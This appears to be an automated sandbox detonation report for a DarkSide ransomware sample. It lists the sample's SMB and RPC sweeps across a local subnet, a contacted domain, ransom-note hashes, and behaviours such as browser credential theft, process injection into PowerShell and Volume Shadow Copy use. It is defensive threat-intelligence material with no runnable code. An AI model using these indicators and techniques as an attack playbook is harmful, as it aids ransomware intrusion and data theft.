US	8.8.8.8:53	237.197.79.204.in-addr.arpa	udp
US	8.8.8.8:53	69.31.126.40.in-addr.arpa	udp
US	8.8.8.8:53	154.239.44.20.in-addr.arpa	udp
N/A	10.127.0.223:445		tcp
N/A	10.127.0.246:445		tcp
N/A	10.127.0.237:445		tcp
N/A	10.127.0.242:445		tcp
N/A	10.127.0.234:445		tcp
N/A	10.127.0.1:445		tcp
N/A	10.127.0.198:445		tcp
N/A	10.127.0.240:445		tcp
N/A	10.127.0.195:445		tcp
N/A	10.127.0.194:445		tcp
N/A	10.127.0.233:445		tcp
N/A	10.127.0.183:445		tcp
N/A	10.127.0.200:445		tcp
N/A	10.127.0.208:445		tcp
N/A	10.127.0.250:445		tcp
N/A	10.127.0.201:445		tcp
N/A	10.127.0.218:445		tcp
N/A	10.127.0.225:445		tcp
N/A	10.127.0.202:445		tcp
N/A	10.127.0.212:445		tcp
N/A	10.127.0.239:445		tcp
N/A	10.127.0.186:445		tcp
N/A	10.127.0.222:445		tcp
N/A	10.127.0.215:445		tcp
N/A	10.127.0.199:445		tcp
N/A	10.127.0.189:445		tcp
N/A	10.127.0.243:445		tcp
N/A	10.127.0.232:445		tcp
N/A	10.127.0.188:445		tcp
N/A	10.127.0.213:445		tcp
N/A	10.127.0.235:445		tcp
N/A	10.127.0.209:445		tcp
N/A	10.127.0.245:445		tcp
N/A	10.127.0.204:445		tcp
N/A	10.127.0.219:445		tcp
N/A	10.127.0.249:445		tcp
N/A	10.127.0.192:445		tcp
N/A	10.127.0.238:445		tcp
N/A	10.127.0.193:445		tcp
N/A	10.127.0.211:445		tcp
N/A	10.127.0.190:445		tcp
N/A	10.127.0.228:445		tcp
N/A	10.127.0.248:445		tcp
N/A	10.127.0.231:445		tcp
N/A	10.127.0.247:445		tcp
N/A	10.127.0.184:445		tcp
N/A	10.127.0.241:445		tcp
N/A	10.127.0.191:445		tcp
N/A	10.127.0.244:445		tcp
N/A	10.127.0.216:445		tcp
N/A	10.127.0.230:445		tcp
N/A	10.127.0.196:445		tcp
N/A	10.127.0.185:445		tcp
N/A	10.127.0.220:445		tcp
N/A	10.127.0.251:445		tcp
N/A	10.127.0.226:445		tcp
N/A	10.127.0.197:445		tcp
N/A	10.127.0.214:445		tcp
N/A	10.127.0.253:445		tcp
N/A	10.127.0.227:445		tcp
N/A	10.127.0.206:445		tcp
N/A	10.127.0.210:445		tcp
N/A	10.127.0.224:445		tcp
N/A	10.127.0.229:445		tcp
N/A	10.127.0.236:445		tcp
N/A	10.127.0.252:445		tcp
N/A	10.127.0.207:445		tcp
N/A	10.127.0.217:445		tcp
N/A	10.127.0.203:445		tcp
N/A	10.127.0.221:445		tcp
N/A	10.127.0.205:445		tcp
N/A	10.127.0.187:445		tcp
N/A	10.127.0.143:445		tcp
N/A	10.127.0.151:445		tcp
N/A	10.127.0.179:445		tcp
N/A	10.127.0.170:445		tcp
N/A	10.127.0.160:445		tcp
N/A	10.127.0.180:445		tcp
N/A	10.127.0.176:445		tcp
N/A	10.127.0.124:445		tcp
N/A	10.127.0.128:445		tcp
N/A	10.127.0.254:445		tcp
N/A	10.127.0.171:445		tcp
N/A	10.127.0.162:445		tcp
N/A	10.127.0.136:445		tcp
N/A	10.127.0.161:445		tcp
N/A	10.127.0.173:445		tcp
N/A	10.127.0.168:445		tcp
N/A	10.127.0.178:445		tcp
N/A	10.127.0.159:445		tcp
N/A	10.127.0.181:445		tcp
N/A	10.127.0.133:445		tcp
N/A	10.127.0.165:445		tcp
N/A	10.127.0.155:445		tcp
N/A	10.127.0.172:445		tcp
N/A	10.127.0.140:445		tcp
N/A	10.127.0.174:445		tcp
N/A	10.127.0.169:445		tcp
N/A	10.127.0.148:445		tcp
N/A	10.127.0.149:445		tcp
N/A	10.127.0.142:445		tcp
N/A	10.127.0.157:445		tcp
N/A	10.127.0.158:445		tcp
N/A	10.127.0.152:445		tcp
N/A	10.127.0.130:445		tcp
N/A	10.127.0.132:445		tcp
N/A	10.127.0.163:445		tcp
N/A	10.127.0.119:445		tcp
N/A	10.127.0.154:445		tcp
N/A	10.127.0.120:445		tcp
N/A	10.127.0.166:445		tcp
N/A	10.127.0.150:445		tcp
N/A	10.127.0.145:445		tcp
N/A	10.127.0.123:445		tcp
N/A	10.127.0.122:445		tcp
N/A	10.127.0.182:445		tcp
N/A	10.127.0.167:445		tcp
N/A	10.127.0.156:445		tcp
N/A	10.127.0.177:445		tcp
N/A	10.127.0.164:445		tcp
N/A	10.127.0.141:445		tcp
N/A	10.127.0.129:445		tcp
N/A	10.127.0.134:445		tcp
N/A	10.127.0.144:445		tcp
N/A	10.127.0.138:445		tcp
N/A	10.127.0.131:445		tcp
N/A	10.127.0.153:445		tcp
N/A	10.127.0.135:445		tcp
N/A	10.127.0.121:445		tcp
N/A	10.127.0.137:445		tcp
N/A	10.127.0.125:445		tcp
N/A	10.127.0.147:445		tcp
N/A	10.127.0.175:445		tcp
N/A	10.127.0.139:445		tcp
N/A	10.127.0.0:445		tcp
N/A	10.127.0.146:445		tcp
N/A	10.127.0.126:445		tcp
N/A	10.127.0.127:445		tcp
N/A	10.127.0.21:445		tcp
N/A	10.127.0.36:445		tcp
N/A	10.127.0.28:445		tcp
N/A	10.127.0.19:445		tcp
N/A	10.127.0.18:445		tcp
N/A	10.127.0.80:445		tcp
N/A	10.127.0.42:445		tcp
N/A	10.127.0.98:445		tcp
N/A	10.127.0.44:445		tcp
N/A	10.127.0.102:445		tcp
N/A	10.127.0.89:445		tcp
N/A	10.127.0.11:445		tcp
N/A	10.127.0.73:445		tcp
N/A	10.127.0.66:445		tcp
N/A	10.127.0.59:445		tcp
N/A	10.127.0.104:445		tcp
N/A	10.127.0.20:445		tcp
N/A	10.127.0.86:445		tcp
N/A	10.127.0.106:445		tcp
N/A	10.127.0.101:445		tcp
N/A	10.127.0.49:445		tcp
N/A	10.127.0.3:445		tcp
N/A	10.127.0.107:445		tcp
N/A	10.127.0.45:445		tcp
N/A	10.127.0.13:445		tcp
N/A	10.127.0.79:445		tcp
N/A	10.127.0.113:445		tcp
N/A	10.127.0.105:445		tcp
N/A	10.127.0.34:445		tcp
N/A	10.127.0.96:445		tcp
N/A	10.127.0.87:445		tcp
N/A	10.127.0.2:445		tcp
N/A	10.127.0.26:445		tcp
N/A	10.127.0.103:445		tcp
N/A	10.127.0.56:445		tcp
N/A	10.127.0.72:445		tcp
N/A	10.127.0.10:445		tcp
N/A	10.127.0.109:445		tcp
N/A	10.127.0.111:445		tcp
N/A	10.127.0.88:445		tcp
N/A	10.127.0.27:445		tcp
N/A	10.127.0.108:445		tcp
N/A	10.127.0.100:445		tcp
N/A	10.127.0.67:445		tcp
N/A	10.127.0.64:445		tcp
N/A	10.127.0.43:445		tcp
N/A	10.127.0.114:445		tcp
N/A	10.127.0.94:445		tcp
N/A	10.127.0.71:445		tcp
N/A	10.127.0.29:445		tcp
N/A	10.127.0.99:445		tcp
N/A	10.127.0.78:445		tcp
N/A	10.127.0.58:445		tcp
N/A	10.127.0.112:445		tcp
N/A	10.127.0.116:445		tcp
N/A	10.127.0.37:445		tcp
N/A	10.127.0.12:445		tcp
N/A	10.127.0.35:445		tcp
N/A	10.127.0.65:445		tcp
N/A	10.127.0.30:445		tcp
N/A	10.127.0.95:445		tcp
N/A	10.127.0.81:445		tcp
N/A	10.127.0.91:445		tcp
N/A	10.127.0.55:445		tcp
N/A	10.127.0.117:445		tcp
N/A	10.127.0.110:445		tcp
N/A	10.127.0.4:445		tcp
N/A	10.127.0.118:445		tcp
N/A	10.127.0.85:445		tcp
N/A	10.127.0.50:445		tcp
N/A	10.127.0.70:445		tcp
N/A	10.127.0.97:445		tcp
N/A	10.127.0.32:445		tcp
N/A	10.127.0.5:445		tcp
N/A	10.127.0.77:445		tcp
N/A	10.127.0.62:445		tcp
N/A	10.127.0.57:445		tcp
N/A	10.127.0.76:445		tcp
N/A	10.127.0.75:445		tcp
N/A	10.127.0.115:445		tcp
N/A	10.127.0.93:445		tcp
N/A	10.127.0.46:445		tcp
N/A	10.127.0.39:445		tcp
N/A	10.127.0.51:445		tcp
N/A	10.127.0.33:445		tcp
N/A	10.127.0.61:445		tcp
N/A	10.127.0.40:445		tcp
N/A	10.127.0.92:445		tcp
N/A	10.127.0.82:445		tcp
N/A	10.127.0.53:445		tcp
N/A	10.127.0.74:445		tcp
N/A	10.127.0.63:445		tcp
N/A	10.127.0.69:445		tcp
N/A	10.127.0.54:445		tcp
N/A	10.127.0.31:445		tcp
N/A	10.127.0.47:445		tcp
N/A	10.127.0.68:445		tcp
N/A	10.127.0.83:445		tcp
N/A	10.127.0.84:445		tcp
N/A	10.127.0.60:445		tcp
N/A	10.127.0.90:445		tcp
N/A	10.127.0.14:445		tcp
N/A	10.127.0.17:445		tcp
N/A	10.127.0.15:445		tcp
N/A	10.127.0.41:445		tcp
N/A	10.127.0.203:135		tcp
N/A	10.127.0.204:135		tcp
N/A	10.127.0.205:135		tcp
N/A	10.127.0.207:135		tcp
N/A	10.127.0.208:135		tcp
N/A	10.127.0.210:135		tcp
N/A	10.127.0.209:135		tcp
N/A	10.127.0.211:135		tcp
N/A	10.127.0.212:135		tcp
N/A	10.127.0.213:135		tcp
N/A	10.127.0.214:135		tcp
N/A	10.127.0.215:135		tcp
N/A	10.127.0.216:135		tcp
N/A	10.127.0.217:135		tcp
N/A	10.127.0.218:135		tcp
N/A	10.127.0.219:135		tcp
N/A	10.127.0.220:135		tcp
N/A	10.127.0.222:135		tcp
N/A	10.127.0.221:135		tcp
N/A	10.127.0.224:135		tcp
N/A	10.127.0.223:135		tcp
N/A	10.127.0.226:135		tcp
N/A	10.127.0.225:135		tcp
N/A	10.127.0.227:135		tcp
N/A	10.127.0.228:135		tcp
N/A	10.127.0.229:135		tcp
N/A	10.127.0.230:135		tcp
N/A	10.127.0.231:135		tcp
N/A	10.127.0.233:135		tcp
N/A	10.127.0.234:135		tcp
N/A	10.127.0.235:135		tcp
N/A	10.127.0.236:135		tcp
N/A	10.127.0.232:135		tcp
N/A	10.127.0.237:135		tcp
N/A	10.127.0.238:135		tcp
N/A	10.127.0.239:135		tcp
N/A	10.127.0.240:135		tcp
N/A	10.127.0.241:135		tcp
N/A	10.127.0.242:135		tcp
N/A	10.127.0.243:135		tcp
N/A	10.127.0.252:135		tcp
N/A	10.127.0.251:135		tcp
N/A	10.127.0.249:135		tcp
N/A	10.127.0.248:135		tcp
N/A	10.127.0.250:135		tcp
N/A	10.127.0.247:135		tcp
N/A	10.127.0.246:135		tcp
N/A	10.127.0.245:135		tcp
N/A	10.127.0.244:135		tcp
N/A	10.127.0.155:135		tcp
N/A	10.127.0.156:135		tcp
N/A	10.127.0.157:135		tcp
N/A	10.127.0.159:135		tcp
N/A	10.127.0.158:135		tcp
N/A	10.127.0.160:135		tcp
N/A	10.127.0.161:135		tcp
N/A	10.127.0.162:135		tcp
N/A	10.127.0.163:135		tcp
N/A	10.127.0.164:135		tcp
N/A	10.127.0.165:135		tcp
N/A	10.127.0.167:135		tcp
N/A	10.127.0.166:135		tcp
N/A	10.127.0.168:135		tcp
N/A	10.127.0.170:135		tcp
N/A	10.127.0.169:135		tcp
N/A	10.127.0.206:135		tcp
N/A	10.127.0.171:135		tcp
N/A	10.127.0.254:135		tcp
N/A	10.127.0.173:135		tcp
N/A	10.127.0.172:135		tcp
N/A	10.127.0.175:135		tcp
N/A	10.127.0.174:135		tcp
N/A	10.127.0.176:135		tcp
N/A	10.127.0.177:135		tcp
N/A	10.127.0.178:135		tcp
N/A	10.127.0.179:135		tcp
N/A	10.127.0.180:135		tcp
N/A	10.127.0.181:135		tcp
N/A	10.127.0.182:135		tcp
N/A	10.127.0.183:135		tcp
N/A	10.127.0.184:135		tcp
N/A	10.127.0.185:135		tcp
N/A	10.127.0.186:135		tcp
N/A	10.127.0.187:135		tcp
N/A	10.127.0.188:135		tcp
N/A	10.127.0.189:135		tcp
N/A	10.127.0.191:135		tcp
N/A	10.127.0.190:135		tcp
N/A	10.127.0.192:135		tcp
N/A	10.127.0.193:135		tcp
N/A	10.127.0.195:135		tcp
N/A	10.127.0.194:135		tcp
N/A	10.127.0.253:135		tcp
N/A	10.127.0.196:135		tcp
N/A	10.127.0.198:135		tcp
N/A	10.127.0.197:135		tcp
N/A	10.127.0.200:135		tcp
N/A	10.127.0.199:135		tcp
N/A	10.127.0.201:135		tcp
N/A	10.127.0.202:135		tcp
N/A	10.127.0.71:135		tcp
N/A	10.127.0.72:135		tcp
N/A	10.127.0.73:135		tcp
N/A	10.127.0.74:135		tcp
N/A	10.127.0.75:135		tcp
N/A	10.127.0.77:135		tcp
N/A	10.127.0.76:135		tcp
N/A	10.127.0.79:135		tcp
N/A	10.127.0.78:135		tcp
N/A	10.127.0.81:135		tcp
N/A	10.127.0.80:135		tcp
N/A	10.127.0.82:135		tcp
N/A	10.127.0.83:135		tcp
N/A	10.127.0.84:135		tcp
N/A	10.127.0.85:135		tcp
N/A	10.127.0.87:135		tcp
N/A	10.127.0.38:445		tcp
N/A	10.127.0.88:135		tcp
N/A	10.127.0.86:135		tcp
N/A	10.127.0.89:135		tcp
N/A	10.127.0.91:135		tcp
N/A	10.127.0.90:135		tcp
N/A	10.127.0.92:135		tcp
N/A	10.127.0.93:135		tcp
N/A	10.127.0.94:135		tcp
N/A	10.127.0.95:135		tcp
N/A	10.127.0.96:135		tcp
N/A	10.127.0.97:135		tcp
N/A	10.127.0.102:135		tcp
N/A	10.127.0.98:135		tcp
N/A	10.127.0.99:135		tcp
N/A	10.127.0.101:135		tcp
N/A	10.127.0.103:135		tcp
N/A	10.127.0.100:135		tcp
N/A	10.127.0.105:135		tcp
N/A	10.127.0.104:135		tcp
N/A	10.127.0.106:135		tcp
N/A	10.127.0.108:135		tcp
N/A	10.127.0.107:135		tcp
N/A	10.127.0.110:135		tcp
N/A	10.127.0.109:135		tcp
N/A	10.127.0.112:135		tcp
N/A	10.127.0.111:135		tcp
N/A	10.127.0.114:135		tcp
N/A	10.127.0.113:135		tcp
N/A	10.127.0.115:135		tcp
N/A	10.127.0.117:135		tcp
N/A	10.127.0.116:135		tcp
N/A	10.127.0.118:135		tcp
N/A	10.127.0.120:135		tcp
N/A	10.127.0.121:135		tcp
N/A	10.127.0.119:135		tcp
N/A	10.127.0.123:135		tcp
N/A	10.127.0.122:135		tcp
N/A	10.127.0.124:135		tcp
N/A	10.127.0.125:135		tcp
N/A	10.127.0.126:135		tcp
N/A	10.127.0.128:135		tcp
N/A	10.127.0.127:135		tcp
N/A	10.127.0.129:135		tcp
N/A	10.127.0.132:135		tcp
N/A	10.127.0.130:135		tcp
N/A	10.127.0.133:135		tcp
N/A	10.127.0.131:135		tcp
N/A	10.127.0.135:135		tcp
N/A	10.127.0.134:135		tcp
N/A	10.127.0.136:135		tcp
N/A	10.127.0.137:135		tcp
N/A	10.127.0.138:135		tcp
N/A	10.127.0.139:135		tcp
N/A	10.127.0.140:135		tcp
N/A	10.127.0.141:135		tcp
N/A	10.127.0.142:135		tcp
N/A	10.127.0.143:135		tcp
N/A	10.127.0.144:135		tcp
N/A	10.127.0.145:135		tcp
N/A	10.127.0.146:135		tcp
N/A	10.127.0.147:135		tcp
N/A	10.127.0.149:135		tcp
N/A	10.127.0.150:135		tcp
N/A	10.127.0.148:135		tcp
N/A	10.127.0.151:135		tcp
N/A	10.127.0.154:135		tcp
N/A	10.127.0.152:135		tcp
N/A	10.127.0.153:135		tcp
N/A	10.127.0.70:135		tcp
N/A	10.127.0.69:135		tcp
N/A	10.127.0.68:135		tcp
N/A	10.127.0.67:135		tcp
N/A	10.127.0.66:135		tcp
N/A	10.127.0.64:135		tcp
N/A	10.127.0.65:135		tcp
N/A	10.127.0.62:135		tcp
N/A	10.127.0.63:135		tcp
N/A	10.127.0.61:135		tcp
N/A	10.127.0.59:135		tcp
N/A	10.127.0.60:135		tcp
N/A	10.127.0.58:135		tcp
N/A	10.127.0.57:135		tcp
N/A	10.127.0.56:135		tcp
N/A	10.127.0.55:135		tcp
N/A	10.127.0.54:135		tcp
N/A	10.127.0.53:135		tcp
N/A	10.127.0.51:135		tcp
N/A	10.127.0.50:135		tcp
N/A	10.127.0.47:135		tcp
N/A	10.127.0.49:135		tcp
N/A	10.127.0.45:135		tcp
N/A	10.127.0.46:135		tcp
N/A	10.127.0.44:135		tcp
N/A	10.127.0.43:135		tcp
N/A	10.127.0.42:135		tcp
N/A	10.127.0.40:135		tcp
N/A	10.127.0.41:135		tcp
N/A	10.127.0.39:135		tcp
N/A	10.127.0.37:135		tcp
N/A	10.127.0.38:135		tcp
N/A	10.127.0.36:135		tcp
N/A	10.127.0.35:135		tcp
N/A	10.127.0.34:135		tcp
N/A	10.127.0.32:135		tcp
N/A	10.127.0.33:135		tcp
N/A	10.127.0.31:135		tcp
N/A	10.127.0.29:135		tcp
N/A	10.127.0.30:135		tcp
N/A	10.127.0.28:135		tcp
N/A	10.127.0.27:135		tcp
N/A	10.127.0.26:135		tcp
N/A	10.127.0.21:135		tcp
N/A	10.127.0.19:135		tcp
N/A	10.127.0.18:135		tcp
N/A	10.127.0.17:135		tcp
N/A	10.127.0.20:135		tcp
N/A	10.127.0.15:135		tcp
N/A	10.127.0.13:135		tcp
N/A	10.127.0.14:135		tcp
N/A	10.127.0.12:135		tcp
N/A	10.127.0.10:135		tcp
N/A	10.127.0.11:135		tcp
N/A	10.127.0.5:135		tcp
N/A	10.127.0.4:135		tcp
N/A	10.127.0.3:135		tcp
N/A	10.127.0.2:135		tcp
N/A	10.127.0.1:135		tcp
N/A	10.127.0.0:135		tcp
N/A	10.127.0.52:135		tcp
N/A	10.127.0.24:135		tcp
N/A	10.127.0.23:135		tcp
N/A	10.127.0.8:135		tcp
N/A	10.127.0.25:135		tcp
N/A	10.127.0.6:135		tcp
N/A	10.127.0.7:135		tcp
N/A	10.127.0.9:135		tcp
N/A	10.127.0.16:135		tcp
N/A	10.127.0.22:135		tcp
N/A	10.127.0.25:445		tcp
N/A	10.127.0.24:445		tcp
N/A	10.127.0.23:445		tcp
N/A	10.127.0.22:445		tcp
N/A	10.127.0.16:445		tcp
N/A	10.127.0.9:445		tcp
N/A	10.127.0.7:445		tcp
N/A	10.127.0.6:445		tcp
N/A	10.127.0.8:445		tcp
N/A	10.127.0.52:445		tcp
US	8.8.8.8:53	157.123.68.40.in-addr.arpa	udp
US	8.8.8.8:53	206.23.85.13.in-addr.arpa	udp
US	8.8.8.8:53	240.143.123.92.in-addr.arpa	udp
US	8.8.8.8:53	205.47.74.20.in-addr.arpa	udp
US	8.8.8.8:53	14.227.111.52.in-addr.arpa	udp
US	8.8.8.8:53	tse1.mm.bing.net	udp
US	150.171.27.10:443	tse1.mm.bing.net	tcp
US	150.171.27.10:443	tse1.mm.bing.net	tcp
US	150.171.27.10:443	tse1.mm.bing.net	tcp
US	150.171.27.10:443	tse1.mm.bing.net	tcp
US	150.171.27.10:443	tse1.mm.bing.net	tcp
US	8.8.8.8:53	104.193.132.51.in-addr.arpa	udp

Files

C:\Program Files\dotnet\Restore-My-Files.txt

MD5	46f50803b898dfb71ae8eb621e2b62c7
SHA1	51f60385a1ac416587ea3189b1a594a548f88dd4
SHA256	8934bcbf7e6052ceb5e9aa922c0de31bc1f10871f79adcca40aa2a628516a687
SHA512	a785241e4bdacb153349806845b77e9a61a35aaf4ace650272e4f2626c3ce058670a067a98ff4ed41e31c78c82f136f16ecb37e83c1c2745e0b3782804a940e5

Analysis: behavioral17

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:43

Platform

win7-20240704-en

Max time kernel

36s

Max time network

44s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe"

Signatures

DarkSide

ransomware darkside

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Renames multiple (154) files with added filename extension

ransomware

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx

Description	Indicator	Process	Target
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A

Command and Scripting Interpreter: PowerShell

execution

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A

Sets desktop wallpaper using registry

ransomware

Description	Indicator	Process	Target
Set value (str)	\REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\b77a682a.BMP"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Set value (str)	\REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\b77a682a.BMP"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery

Description	Indicator	Process	Target
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A

Modifies Control Panel

evasion

Description	Indicator	Process	Target
Set value (str)	\REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Control Panel\Desktop\WallpaperStyle = "10"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A

Modifies registry class

Description	Indicator	Process	Target
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\b77a682a	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\b77a682a\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\b77a682a.ico"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.b77a682a	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.b77a682a\ = "b77a682a"	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\b77a682a\DefaultIcon	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: SeIncreaseQuotaPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeRemoteShutdownPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: 33	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: 34	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: 35	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeAuditPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 2556 wrote to memory of 2592	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2556 wrote to memory of 2592	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2556 wrote to memory of 2592	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2556 wrote to memory of 2592	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country	Destination	Domain	Proto
US	8.8.8.8:53	catsdegree.com	udp
US	76.223.54.146:443	catsdegree.com	tcp
US	8.8.8.8:53	1.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	20.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	13.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	16.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	29.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	74.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	10.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	52.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	32.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	69.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	30.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	67.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	28.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	65.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	61.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	59.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	26.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	55.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	24.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	53.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	22.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	51.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	18.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	49.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	45.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	2.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	43.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	127.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	39.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	121.0.127.10.in-addr.arpa	udp
US	8.8.8.8:53	119.0.127.10.in-addr.arpa	udp
